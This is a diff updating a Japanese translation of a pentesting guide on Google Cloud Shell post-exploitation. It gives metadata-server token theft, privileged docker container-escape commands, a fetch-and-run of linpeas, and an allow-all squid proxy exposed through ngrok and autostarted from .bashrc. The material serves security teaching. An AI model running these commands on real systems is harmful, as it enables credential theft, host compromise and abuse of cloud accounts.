Translated ['', 'src/pentesting-cloud/gcp-security/gcp-post-exploitation

src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md

@@ -4,46 +4,46 @@
 
 ## Cloud Shell
 
-Cloud Shell の詳細については次を参照してください:
+Cloud Shell の詳細は次を参照してください:
 
 {{#ref}}
 ../gcp-services/gcp-cloud-shell-enum.md
 {{#endref}}
 
-### Container Escape
+### metadata からユーザーの token を取得する
 
-Google Cloud Shell はコンテナ内で動作しているため、次のようにして **easily escape to the host** できます:
+metadata server にアクセスするだけで、現在ログインしているユーザーとしてアクセスするための token を取得できます:
+```bash
+wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
+```
+### Container Escape / Docker use
+
+> [!WARNING]
+> 以前は cloud shell はホストの docker ソケットにアクセスできるコンテナ内で実行されていました。現在は Google がアーキテクチャを変更し、cloud shell コンテナは "Docker in a container" 構成で動作しています。つまり、cloud shell から docker を使用できても、docker ソケットを使ってホストへエスケープすることはできません。
+> Note that previously the `docker.sock` file was located in `/google/host/var/run/docker.sock` but now it has been moved to `/run/docker.sock`.
 
 <details>
 
-<summary>Container escape commands</summary>
+<summary>Docker use / Old container escape commands</summary>
 ```bash
-sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
-sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
-sudo docker -H unix:///google/host/var/run/docker.sock start escaper
-sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh
+sudo docker -H unix:///run/docker.sock pull alpine:latest
+sudo docker -H unix:///run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
+sudo docker -H unix:///run/docker.sock start escaper
+sudo docker -H unix:///run/docker.sock exec -it escaper /bin/sh
 ```
 </details>
 
-これは google によって脆弱性とは見なされませんが、その環境で何が起きているかをより広く把握できます。
-
-さらに、ホスト上から service account token を見つけられる点に注意してください:
+さらに、以前は cloud shell VM で使用されている service account の token を metadata server で見つけることが可能でした:
 
 <details>
 
-<summary>Get service account from metadata</summary>
+<summary>metadata からの古い service account</summary>
 ```bash
 wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
 default/
 vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/
 ```
-</details>
-
-以下のスコープ:
-
-<details>
-
-<summary>サービスアカウントのスコープを取得</summary>
+次のスコープが付与されている場合:
 ```bash
 wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"
 
@@ -53,23 +53,11 @@ https://www.googleapis.com/auth/monitoring.write
 ```
 </details>
 
-LinPEASでメタデータを列挙する:
 
-<details>
 
-<summary>LinPEASでメタデータを列挙する</summary>
-```bash
-cd /tmp
-wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
-sh linpeas.sh -o cloud
-```
-</details>
+### プロキシとして使用する
 
-[https://github.com/carlospolop/bf_my_gcp_permissions](https://github.com/carlospolop/bf_my_gcp_permissions) を Service Account のトークンで使用した後、**権限は見つかりませんでした**...
-
-### Proxy として使用する
-
-もし google cloud shell instance を proxy として使用したい場合、次のコマンドを実行する必要があります（または .bashrc ファイルに挿入してください）：
+google cloud shell インスタンスをプロキシとして使用したい場合は、次のコマンドを実行する必要があります（または .bashrc ファイルに挿入してください）：
 
 <details>
 
@@ -79,7 +67,7 @@ sudo apt install -y squid
 ```
 </details>
 
-参考までに、Squid は http プロキシサーバーです。次の設定で **squid.conf** ファイルを作成してください:
+参考: Squid は http proxy server です。以下の設定で **squid.conf** ファイルを作成してください:
 
 <details>
 
@@ -96,39 +84,39 @@ http_access allow all
 
 <details>
 
-<summary>設定を **/etc/squid** にコピー</summary>
+<summary>設定を /etc/squid にコピー</summary>
 ```bash
 sudo cp squid.conf /etc/squid
 ```
 </details>
 
-最後に Squid サービスを起動します:
+最後に squid サービスを起動します:
 
 <details>
 
-<summary>Squid サービスを起動</summary>
+<summary>Squid サービスを開始</summary>
 ```bash
 sudo service squid start
 ```
 </details>
 
-ngrok を使って proxy を外部から利用できるようにします:
+ngrok を使ってプロキシを外部から利用できるようにします:
 
 <details>
 
-<summary>ngrok で proxy を公開する</summary>
+<summary>ngrok を使ってプロキシを公開する</summary>
 ```bash
 ./ngrok tcp 3128
 ```
 </details>
 
-実行後、tcp:// の URL をコピーしてください。ブラウザから proxy を実行したい場合は、tcp:// の部分とポートを削除し、ブラウザのプロキシ設定のポート欄にそのポートを入力することをお勧めします（squid は http プロキシサーバーです）。
+実行後、tcp:// URL をコピーしてください。ブラウザから proxy を実行したい場合は、tcp:// 部分と port を削除し、port をブラウザの proxy 設定の port 欄に入力することを推奨します（squid は http proxy サーバーです）。
 
-起動時に使いやすくするため、.bashrc ファイルに以下の行を追加してください：
+起動時の利便性向上のため、.bashrc ファイルには次の行を追加してください:
 
 <details>
 
-<summary>.bashrc に自動起動用の設定を追加</summary>
+<summary>.bashrc に追加して自動起動</summary>
 ```bash
 sudo apt install -y squid
 sudo cp squid.conf /etc/squid/
@@ -137,6 +125,6 @@ cd ngrok;./ngrok tcp 3128
 ```
 </details>
 
-これらの手順は [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key) からコピーされました。Cloud Shell であらゆる種類のソフトウェア（databases や windows ですら）を実行するための他の奇抜なアイデアについては、そのページを確認してください。
+指示は [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key) から転載しました。Cloud Shellであらゆる種類のソフトウェア（databases や windows さえ）を実行するための他のクレイジーなアイデアはそのページを確認してください。
 
 {{#include ../../../banners/hacktricks-training.md}}